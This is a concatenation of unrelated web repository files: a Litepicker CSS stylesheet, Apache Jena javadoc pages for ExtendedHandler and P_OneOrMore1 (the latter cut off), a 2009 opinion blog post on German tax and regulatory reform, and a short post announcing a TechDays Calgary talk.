/*! * * ../css/plugins/mobilefriendly.js.css * Litepicker v2.0.7 (https://github.com/wakirin/Litepicker) * Package: litepicker (https://www.npmjs.com/package/litepicker) * License: MIT (https://github.com/wakirin/Litepicker/blob/master/LICENCE.md) * Copyright 2019-2021 Rinat G. * * Hash: b1cff43469fd77f57554 * */ :root { --litepicker-mobilefriendly-backdrop-color-bg: #000; } .litepicker-backdrop { display: none; background-color: var(--litepicker-mobilefriendly-backdrop-color-bg); opacity: 0.3; position: fixed; top: 0; right: 0; bottom: 0; left: 0; } .litepicker-open { overflow: hidden; } .litepicker.mobilefriendly[data-plugins*="mobilefriendly"] { -webkit-transform: translate(-50%, -50%); transform: translate(-50%, -50%); font-size: 1.1rem; --litepicker-container-months-box-shadow-color: #616161; } .litepicker.mobilefriendly-portrait { --litepicker-day-width: 13.5vw; --litepicker-month-width: calc(var(--litepicker-day-width) * 7); } .litepicker.mobilefriendly-landscape { --litepicker-day-width: 5.5vw; --litepicker-month-width: calc(var(--litepicker-day-width) * 7); } .litepicker[data-plugins*="mobilefriendly"] .container__months { overflow: hidden; } .litepicker.mobilefriendly[data-plugins*="mobilefriendly"] .container__months .month-item-header { height: var(--litepicker-day-width); } .litepicker.mobilefriendly[data-plugins*="mobilefriendly"] .container__days > div { height: var(--litepicker-day-width); display: -webkit-box; display: -ms-flexbox; display: flex; -webkit-box-align: center; -ms-flex-align: center; align-items: center; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center; } .litepicker[data-plugins*="mobilefriendly"] .container__months .month-item { -webkit-transform-origin: center; transform-origin: center; } .litepicker[data-plugins*="mobilefriendly"] .container__months .month-item.touch-target-next { -webkit-animation-name: lp-bounce-target-next; animation-name: lp-bounce-target-next; -webkit-animation-duration: .5s; animation-duration: .5s; -webkit-animation-timing-function: ease; animation-timing-function: ease; } .litepicker[data-plugins*="mobilefriendly"] .container__months .month-item.touch-target-prev { -webkit-animation-name: lp-bounce-target-prev; animation-name: lp-bounce-target-prev; -webkit-animation-duration: .5s; animation-duration: .5s; -webkit-animation-timing-function: ease; animation-timing-function: ease; } @-webkit-keyframes lp-bounce-target-next { from { -webkit-transform: translateX(100px) scale(0.5); transform: translateX(100px) scale(0.5); } to { -webkit-transform: translateX(0px) scale(1); transform: translateX(0px) scale(1); } } @keyframes lp-bounce-target-next { from { -webkit-transform: translateX(100px) scale(0.5); transform: translateX(100px) scale(0.5); } to { -webkit-transform: translateX(0px) scale(1); transform: translateX(0px) scale(1); } } @-webkit-keyframes lp-bounce-target-prev { from { -webkit-transform: translateX(-100px) scale(0.5); transform: translateX(-100px) scale(0.5); } to { -webkit-transform: translateX(0px) scale(1); transform: translateX(0px) scale(1); } } @keyframes lp-bounce-target-prev { from { -webkit-transform: translateX(-100px) scale(0.5); transform: translateX(-100px) scale(0.5); } to { -webkit-transform: translateX(0px) scale(1); transform: translateX(0px) scale(1); } }
apache-jena-3.0.0/javadoc-core/org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html
slennie12/SOR-Onderzoek
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_45-internal) on Sat Jul 25 18:13:22 BST 2015 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>ExtendedHandler (Apache Jena)</title> <meta name="date" content="2015-07-25"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="ExtendedHandler (Apache Jena)"; } } catch(err) { } //--> var methods = {"i0":6,"i1":6,"i2":6,"i3":6}; var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],4:["t3","Abstract Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/ExtendedHandler.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/jena/rdfxml/xmlinput/DOM2Model.html" title="class in org.apache.jena.rdfxml.xmlinput"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../../org/apache/jena/rdfxml/xmlinput/FatalParsingErrorException.html" title="class in org.apache.jena.rdfxml.xmlinput"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html" target="_top">Frames</a></li> <li><a href="ExtendedHandler.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.apache.jena.rdfxml.xmlinput</div> <h2 title="Interface ExtendedHandler" class="title">Interface ExtendedHandler</h2> </div> <div class="contentContainer"> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Known Subinterfaces:</dt> <dd><a href="../../../../../org/apache/jena/rdfxml/xmlinput/ARPEventHandler.html" title="interface in org.apache.jena.rdfxml.xmlinput">ARPEventHandler</a></dd> </dl> <hr> <br> <pre>public interface <span class="typeNameLabel">ExtendedHandler</span></pre> <div class="block">Extended callbacks from a reader to an RDF application. This reports: <ul> <li> when a blank node goes out of scope, allowing its anonymous ID to be freed by external applications. <li> when a rdf:RDF start and end tag is seen</div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t3" class="tableTab"><span><a href="javascript:show(4);">Abstract Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>boolean</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#discardNodesWithNodeID--">discardNodesWithNodeID</a></span>()</code> <div class="block">This method is used to modify the behaviour of ARP concerning its reporting of bnode scope <a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#endBNodeScope-org.apache.jena.rdfxml.xmlinput.AResource-"><code>endBNodeScope(org.apache.jena.rdfxml.xmlinput.AResource)</code></a>.</div> </td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#endBNodeScope-org.apache.jena.rdfxml.xmlinput.AResource-">endBNodeScope</a></span>(<a href="../../../../../org/apache/jena/rdfxml/xmlinput/AResource.html" title="interface in org.apache.jena.rdfxml.xmlinput">AResource</a>&nbsp;bnode)</code> <div class="block">After this call, no more triples will be reported which use <code>bnode</code>.</div> </td> </tr> <tr id="i2" class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#endRDF--">endRDF</a></span>()</code> <div class="block">Called when the &lt;/rdf:RDF&gt; tag is seen.</div> </td> </tr> <tr id="i3" class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#startRDF--">startRDF</a></span>()</code> <div class="block">Called when the &lt;rdf:RDF&gt; tag is seen.</div> </td> </tr> </table> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="endBNodeScope-org.apache.jena.rdfxml.xmlinput.AResource-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>endBNodeScope</h4> <pre>void&nbsp;endBNodeScope(<a href="../../../../../org/apache/jena/rdfxml/xmlinput/AResource.html" title="interface in org.apache.jena.rdfxml.xmlinput">AResource</a>&nbsp;bnode)</pre> <div class="block">After this call, no more triples will be reported which use <code>bnode</code>. This is called exactly once for each blank nodes. Whether this includes nodes with an <code>rdf:nodeID</code> is controlled by <a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#discardNodesWithNodeID--"><code>discardNodesWithNodeID()</code></a>. <p> The contract is robust against syntax errors in input, and exceptions being thrown by the StatementHandler.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>bnode</code> - A blank node going out of scope.</dd> </dl> </li> </ul> <a name="discardNodesWithNodeID--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>discardNodesWithNodeID</h4> <pre>boolean&nbsp;discardNodesWithNodeID()</pre> <div class="block">This method is used to modify the behaviour of ARP concerning its reporting of bnode scope <a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#endBNodeScope-org.apache.jena.rdfxml.xmlinput.AResource-"><code>endBNodeScope(org.apache.jena.rdfxml.xmlinput.AResource)</code></a>. <p> If this returns true then blank nodes with an <code>rdf:nodeID</code> are not reported as they go out of scope at the end of file. This eliminates the unbounded memory cost of remembering such nodes. <p> If this returns false then the contract of <a href="../../../../../org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html#endBNodeScope-org.apache.jena.rdfxml.xmlinput.AResource-"><code>endBNodeScope(org.apache.jena.rdfxml.xmlinput.AResource)</code></a> is honoured uniformly independent of whether a blank node has a nodeID or not. <p> If this method returns different values during the parsing of a single file, then the behaviour is undefined.</div> <dl> <dt><span class="returnLabel">Returns:</span></dt> <dd>Desired behaviour of endBNodeScope.</dd> </dl> </li> </ul> <a name="startRDF--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>startRDF</h4> <pre>void&nbsp;startRDF()</pre> <div class="block">Called when the &lt;rdf:RDF&gt; tag is seen. (Also called when there is an implicit start of RDF content when the file consists only of RDF but omits the rdf:RDF tag).</div> </li> </ul> <a name="endRDF--"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>endRDF</h4> <pre>void&nbsp;endRDF()</pre> <div class="block">Called when the &lt;/rdf:RDF&gt; tag is seen. (Also called when there is an implicit end of RDF content e.g. when the file consists only of RDF but omits the rdf:RDF tag, or if there is an unrecoverable syntax error mid-file). <p> Robust against syntax errors in input, and exceptions being thrown by the StatementHandler.</div> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/ExtendedHandler.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/jena/rdfxml/xmlinput/DOM2Model.html" title="class in org.apache.jena.rdfxml.xmlinput"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../../org/apache/jena/rdfxml/xmlinput/FatalParsingErrorException.html" title="class in org.apache.jena.rdfxml.xmlinput"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/jena/rdfxml/xmlinput/ExtendedHandler.html" target="_top">Frames</a></li> <li><a href="ExtendedHandler.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Licenced under the Apache License, Version 2.0</small></p> </body> </html>
blog/2009/01/ideas-for-a-stimulus-package-german-edition.html
Stwissel/stwissel.github.io
<!DOCTYPE html> <html lang="en"> <head> <title>Ideas for a stimulus package (German edition) - NotesSensei's Blog</title> <script> window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-72033-1', 'auto'); ga('send', 'pageview'); </script> <script async src='https://www.google-analytics.com/analytics.js'></script> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="chrome=1" /> <meta http-equiv="Content-Language" content="en" /> <meta rel="meta" link="application/rdf+xml" content="/foaf.rdf" /> <meta property="og:title" content="wissel.net - Ideas for a stimulus package (German edition)" /> <meta property="og:type" content="blog" /> <meta property="og:url" content="https://wissel.net/blog/2009/01/ideas-for-a-stimulus-package-german-edition.html" /> <meta property="og:image" content="//www.wissel.net/blog/img/wisselnet.gif" /> <meta property="og:site_name" content="wissel.net" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="ROBOTS" content="FOLLOW, NOIMAGEINDEX" /> <meta name="DC.Title" content="NotesSensei's Weblog - Ideas for a stimulus package (German edition)" /> <meta name="Author" content="Stephan H. Wissel" /> <meta name="ICBM" content="1.2994, 103.8425" /> <meta name="Copyright" content="2002,2020 Stephan H. Wissel - Creative commons licence" /> <meta name="twitter:site" content="@notessensei" /> <meta name="twitter:card" content="summary" /> <meta name="xing:author" content="https://www.xing.com/profile/StephanH_Wissel" /> <meta name="description" content="Ideas for a stimulus package (German edition) - All over the planet government are throwing (more or less) money into their economies to get them back on track. Throwing money is easy, everybody does it. In the US president elect Obama thinks a little ahead: he realizes that a working infrastructure is bitterly needed. After all rolling power out" /> <meta name="Keywords" content="After hours," /> <meta name="Abstract" content="Ideas for a stimulus package (German edition) - All over the planet government are throwing (more or less) money into their economies to get them back on track. Throwing money is easy, everybody does it. In the US president elect Obama thinks a little ahead: he realizes that a working infrastructure is bitterly needed. After all rolling power out" /> <!--[if lt IE 9]> <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" type="text/css" href="/blog/style/bootstrap.css" /> <link rel="stylesheet" type="text/css" href="/blog/style/responsive.css" /> <link rel="stylesheet" type="text/css" href="/blog/style/wisselblog.css" /> <link rel="stylesheet" type="text/css" href="/blog/style/main.css" /> <link rel="stylesheet" type="text/css" href="/blog/style/blogcodedisplay.css" /> <link rel="stylesheet" type="text/css" href="/blog/style/shariff.complete.css" /> <link rel="stylesheet" type="text/css" href="/blog/style/markdown.css" /> <link rel="stylesheet" type="text/css" href="/blog/css/prism.css" /> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Raleway&display=swap" rel="stylesheet"> <link rel="icon" type="image/png" href="/blog/img/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="/blog/img/favicon-16x16.png" sizes="16x16" /> <link rel="alternate" type="application/rss+xml" title="RSS News Feed" href="https://feeds.feedburner.com/Wisselnetfeed" /> <meta name="Revisit-After" content="90 Days" /> </head> <body class="line-numbers"> <div class="navbar navbar-inverse navbar-fixed-top"> <div class="navbar-inner"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <a class="brand" href="/">wissel.net</a> <div class="nav-collapse"> <ul class="nav"> <li><a href="/index.html">Home</a></li> <li class="active"><a href="/blog/">Blog</a></li> <li><a href="/blog/series.html">Series</a></li> <li><a href="/blog/downloads/">Downloads</a></li> <li><a href="https://stwissel.github.io/presentations/" title="Presentations maintained on GitHub">Presentations</a></li> <li><a href="/blog/imprint.html">About / Imprint</a></li> </ul> <form action="//www.google.com/cse" id="cse-search-box" class="navbar-search pull-right"> <div> <input type="hidden" name="cx" value="partner-pub-4562257798204150:muo14ionenw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" class="search-query span2" placeholder="Search" /> <!-- input type="submit" name="sa" value="Search" class="btn btn-small"/--> </div> </form> </div> </div> </div> <div class="navbar-spacer"></div> <div class="container"> <br /> <header> <div id="mainsmall" class="hero-unit"> <h2>wissel.net</h2> <p>Usability - Productivity - Business - The web - Singapore &amp; Twins</p> </div> </header> <ul class="breadcrumb"> <li><a href="/blog/">Blog</a> <span class="divider">/</span></li> <li><a href="/blog/2009/">2009</a> <span class="divider">/</span></li> <li><a href="/blog/2009/01/">January</a></li> <li class="pull-right"> <span class="divider">|</span><a href="/blog/categories/afterhours.html">After hours</a> </li> </ul> <div class="row-fluid"> <div class="span12"> <ul class="breadcrumb pull-centre"> <li><a href="/blog/2009/01/overheard-at-a-developer-discussion.html"><i class="icon-hand-left"></i>Overheard at a developer discussion</a> <span class="divider">|</span></li> <li><a href="/blog/"><i class="icon-hand-up"></i>Main</a></li> <span class="divider">|</span> <li><a href="/blog/2009/01/ad215-teaser.html">AD215 - Teaser<i class="icon-hand-right"></i></a> </li> </ul> <article class="well well-raised"> <h1><small>Ideas for a stimulus package (German edition)</small></h1> <hr /> <div>All over the planet government are throwing (more or less) money into their economies to get them back on track. Throwing money is easy, everybody does it. In the US president elect Obama thinks a little ahead: he realizes that a working infrastructure is bitterly needed. After all rolling power outages are an indicator of a 3rd world country. Looking towards Germany that won't work. The infrastructure is pretty good and Germany surely won't need Japanese bridges going nowhere. Some more creativity is needed. Home ownership im Germany is still low. One reason are the cost of building a house which are much higher than in countries with similar climate like Denmark or the Netherlands. A major reason are the myriads of laws, regulations and bylaws. Same applies to <a href="http://www.doingbusiness.org/ExploreEconomies/?economyid=75">starting a business</a>. So here comes my unsolicited advice: <ul> <li>Take the German tax code, pile it high and put a match to it (what a bonfire that would be). Visit smaller countries like Slovenia, Switzerland or Singapore and buy their tax laws (allow for some adjustment to fit the German federal structure, the Swiss approach looks appealing). Set the tax rates so this would be result neutral. A strong signal is send to all Citizens that this is serious, borrowing a line from the US: Change is possible. (Unfortunately public servants and tax consultants have a strong lobby and are over-represented in parliament, so it is a pipe dream)</li> <li>Take all the public servants you don't need anymore in the ministry of finance and redeploy them. Part would take the building code and eliminate all regulations that don't have a proven track record or equivalents in other countries. Stop only once 95% of the regulations are gone. Retrain the rest to become teachers and trainers and boost the education level of just everyone who has any single of the five senses still working. After all Germans value education very highly (at least it used to be so).</li> <li>Once the building code is cleansed take on the business regulations. Wear your Teflon underwear and carry a big stick, there are many fiefdoms who will resist you.</li> <li>While you are on it: clean out the rest of over-regulations and re-establish a firm rule of the <a href="http://en.wikipedia.org/wiki/Principle_of_subsidiarity">principle of subsidiarity</a> (<a href="http://de.wikipedia.org/wiki/Subsidiarit%C3%A4t">German Version</a>)</li> <li>In a little deviation from simplifying the tax code: give a tax break to anybody who participated in education or health improving activities (Yoga, Tai Chi and Sports in General)</li> <li>Make it mandatory that at the end of each visit to a doctor the patient gets handed out a printed bill. While here in Singapore you have to settle the bill immediately (mayor credit cards accepted) you could still keep the settlement system you have in place. Just make it 100% clear in black and white to the patient</li> <li><a href="http://en.wikipedia.org/wiki/Open-book_Accounting">Publish</a> all public finances on a website with business analysis tools, so they can be scrutinized for efficiency. Put a process in place for review (you have all the surplus people from the ministry of finance).</li> </ul> That would boost the economy with a big lever.</div> <hr /> <p> Posted by <a rel="author" href="https://plus.google.com/u/0/+StephanWissel"> Stephan H Wissel</a> on 10 January 2009 <span class="divider">|</span> <a href="/blog/2009/01/ideas-for-a-stimulus-package-german-edition.html#comments">Comments (1)</a> <span class="divider">|</span> categories: <a href="/blog/categories/afterhours.html">After hours</a> <script type="text/javascript"> var permaLink = "https://wissel.net/blog/2009/01/ideas-for-a-stimulus-package-german-edition.html"; </script> </p> </article> <a name="comments"></a> <div class="well well-raised" style="text-align : center"> <button class="btn btn-lg btn-info" data-toggle="collapse" data-target="#commentform_B4352868515D3CCA4825753A002D0703" type="button"> Add your comment...&nbsp;&nbsp;<span class="glyphicon glyphicon-comment"></span> </button> </div> <div id="commentform_B4352868515D3CCA4825753A002D0703" class="collapse"></div> <div class="well well-raised"> <h4>Comments</h4> <ol id="commentList"> <li> posted by <b>Jan-Piet Mens</b> on <i>Sunday 11 January 2009 AD</i>:<br /> Where can I sign the petition for this excellent idea? <img alt="Emoticon smile.gif" src="/blog/images/emoticons/smile.gif" border="0" /> <hr style="clear : both" /> </li> </ol> </div> <ul class="breadcrumb pull-centre"> <li><a href="/blog/2009/01/overheard-at-a-developer-discussion.html"><i class="icon-hand-left"></i>Overheard at a developer discussion</a> <span class="divider">|</span></li> <li><a href="/blog/"><i class="icon-hand-up"></i>Main</a></li> <span class="divider">|</span> <li><a href="/blog/2009/01/ad215-teaser.html">AD215 - Teaser<i class="icon-hand-right"></i></a> </li> </ul> </div> </div> <ul class="breadcrumb"> <li><a href="/blog/">Blog</a> <span class="divider">/</span></li> <li><a href="/blog/2009/">2009</a> <span class="divider">/</span></li> <li><a href="/blog/2009/01/">January</a></li> <li class="pull-right"> <span class="divider">|</span><a href="/blog/categories/afterhours.html">After hours</a> </li> </ul> </div> <footer> <div class="container"> <div class="row"> <div class="span2"> <h4>About Me</h4> <p> I work as "Solution Director Innovation" for HCL Software. I'm based in Singapore. <g:plusone size="small" href="https://wissel.net/blog/"></g:plusone> </p> <a href="//stackoverflow.com/users/131021/stwissel"> <img src="//stackoverflow.com/users/flair/131021.png" width="208" height="58" alt="profile for stwissel at Stack Overflow, Q&amp;A for professional and enthusiast programmer" title="profile for stwissel at Stack Overflow, Q&amp;A for professional and enthusiast programmer"> </a> </div> <div class="span2"> <h4>Contact</h4> <ul> <li><a href="https://www.twitter.com/notessensei">Twitter</a></li> <li><a href="https://sg.linkedin.com/in/notessensei">LinkedIn</a></li> <li><a href="https://www.xing.com/profile/StephanH_Wissel">XING</a></li> <li><a href="https://notessensei.myspreadshop.com">NotesSensei's Spreadshirt shop</a></li> <li><a href="http://about.me/stephan.wissel/#" title="Another identity site, nothing much here">About Me</a></li> </ul> </div> <div class="span8"> <h4>Disclaimer</h4> <p>This site is in no way affiliated, endorsed, sanctioned, supported, nor enlightened by my current or previous employers. I may be an employee, but the opinions, theories, facts, etc. presented here are my own and are in now way given in any official capacity. In short, these are my words and this is my site, not my current or former employers' - and don't even begin to think otherwise.</p> <p> <b>&copy; 2003 - 2022 Stephan H. Wissel - some rights reserved</b> as listed here: <a rel="license" href="//creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Creative Commons License" style="border-width: 0" src="//licensebuttons.net/l/by-nc-sa/3.0/88x31.png" /></a> Unless otherwise labeled by its originating author, the content found on this site is made available under the terms of an <a href="//creativecommons.org/licenses/by-nc-sa/3.0/" target="_blank" title="Learn more about the creative commons Attribution-ShareAlike License">Attribution/NonCommercial/ShareAlike Creative Commons License</a>, with the exception that no rights are granted -- since they are not mine to grant -- in any logo, graphic design, trademarks or trade names of any type. Code samples and code downloads on this site are, unless otherwise labeled, made available under an <a href="//www.apache.org/licenses/LICENSE-2.0.html">Apache 2.0</a> license. Other license models are available on written request and written confirmation. </p> </div> </div> </div> </footer> <script type="text/javascript"> var permaLink = "https://wissel.net/blog/2009/01/ideas-for-a-stimulus-package-german-edition.html"; </script> <script type="text/javascript" src="/blog/js/jquery-3.6.0.min.js"></script> <script type="text/javascript" src="/blog/js/bootstrap.js"></script> <script type="text/javascript" src="/blog/js/blogmain.js"></script> <script type="text/javascript" src="/blog/js2/prism.js"></script> <script src="//www.google-analytics.com/urchin.js" type="text/javascript"></script> <script type="text/javascript"> _uacct = "UA-72033-1"; urchinTracker(); </script> <script type="text/javascript" src="//feeds.feedburner.com/~s/Wisselnet?i=https://wissel.net/blog" charset="utf-8"></script> <script src="/blog/js2/mustache.js"></script> <script src="/blog/js2/blogcomments.js"></script> <script type="text/javascript" src="/blog/js2/Markdown.Converter.js"></script> <script type="text/javascript" src="/blog/js2/Markdown.Sanitizer.js"></script> <script type="text/javascript" src="/blog/js2/Markdown.Editor.js"></script> <script type="text/javascript" src="//www.google.com/recaptcha/api.js"></script> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script> <script type="text/javascript"> var onloadCallback = function() { renderComment("6LcBxUEUAAAAACzKM8YKb-RVVaIZ3MN6F1Z8FB_4", "B4352868515D3CCA4825753A002D0703"); }; </script> </body> </html>
_posts/2009-11-10-techdays-2009-in-calgary.html
topgenorth/topgenorth.github.io
--- layout: post title: TechDays 2009 In Calgary tags: - Programming status: publish type: post published: true meta: _edit_last: "2" --- Just a heads up that <a href="http://www.microsoft.com/canada/techdays/default.aspx">TechDays Canada 2009</a> is happening in Calgary next week on November 17 and 18.  Yours truly will be there for the whole morning of November 18th talking about ASP.NET MVC and SOLID (note that this is <strong>not</strong> the same SOLID talk from the DevFundamentals track at TechDays Vancouver and TechDays Toronto).  If you happen to be there, don't be afraid to come on by and say hello. <div class="zemanta-pixie"><img class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=398917f8-5ef2-8681-9044-b9ab8d709d26" alt="" /></div>
apache-jena-3.0.0/javadoc-arq/org/apache/jena/sparql/path/P_OneOrMore1.html
slennie12/SOR-Onderzoek
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_45-internal) on Sat Jul 25 18:14:29 BST 2015 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>P_OneOrMore1 (Apache Jena ARQ)</title> <meta name="date" content="2015-07-25"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="P_OneOrMore1 (Apache Jena ARQ)"; } } catch(err) { } //--> var methods = {"i0":10,"i1":10,"i2":10}; var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/P_OneOrMore1.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/jena/sparql/path/P_NegPropSet.html" title="class in org.apache.jena.sparql.path"><span 